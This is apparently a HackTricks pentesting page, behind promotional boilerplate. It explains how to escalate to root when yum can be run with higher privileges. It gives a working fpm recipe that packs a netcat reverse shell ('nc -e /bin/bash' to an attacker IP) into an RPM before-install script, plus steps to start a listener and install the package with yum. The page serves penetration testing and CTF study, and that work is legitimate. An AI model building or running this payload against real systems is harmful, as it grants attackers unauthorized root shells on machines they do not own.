3.7 KiB

Raw Blame History

Support HackTricks and get benefits!

Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!

Discover The PEASS Family, our collection of exclusive NFTs

Get the official PEASS & HackTricks swag

Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.

Share your hacking tricks submitting PRs to the hacktricks github repo.

Further examples around yum can also be found on gtfobins.

Executing arbitrary commands via RPM Packages

Checking the Environment

In order to leverage this vector the user must be able to execute yum commands as a higher privileged user, i.e. root.

A working example of this vector

A working example of this exploit can be found in the daily bugle room on tryhackme.

Packing an RPM

In the following section, I will cover packaging a reverse shell into an RPM using fpm.

The example below creates a package that includes a before-install trigger with an arbitrary script that can be defined by the attacker. When installed, this package will execute the arbitrary command. I've used a simple reverse netcat shell example for demonstration but this can be changed as necessary.

EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR

Catching a shell

Using the above example and assuming yum can be executed as a higher-privileged user.

Transfer the rpm to the host
Start a listener on your local host such as the example netcat listener
Install the vulnerable package yum localinstall -y exploited-1.0-1.noarch.rpm